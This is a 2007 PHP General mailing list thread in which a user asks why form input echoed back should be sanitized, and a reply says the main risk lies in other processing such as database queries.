Thanks Stut and Daniel,
I guess my fears were somewhat unfounded. At least in the case where
you're the only one who sees the result.
- Dan
""Daniel Brown"" <parasane@xxxxxxxxx> wrote in message
news:ab5568160708071508i3b186617h7a1c7db1ae7b69e2@xxxxxxxxxxxxxxxxx
On 8/7/07, Dan <frozendice@xxxxxxxxx> wrote:
I've always heard it is bad if you let a user type some input, then show
it
back to them w/o sanatizing the code. Eg. I have a form, where the user
types something, they hit submit and it submits to itself then prints
back
to the user something like, account created with password: whatever they
typed.
Why and how do you sanatize what they typed before echoing it back to
them?
I figured it was something like they could type in PHP commands but I
tried
typeing phpinfo(); into the box and submitting. All that happened is
that
it echoed phpinfo();
Can someone explain this?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
It's actually not so much for echo'ing as it is for processing the
data in another manner that makes it dangerous not to do some
sanitizing and checking.... such as database manipulation.
--
Daniel P. Brown
[office] (570-) 587-7080 Ext. 272
[mobile] (570-) 766-8107
Hey, PHP-General list.... to give something back to everyone, you guys
can have 50% off every month on hosting plans of $10/mo. or more (list
price) at http://www.pilotpig.net/.
Use the coupon code phpgeneralaug07
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
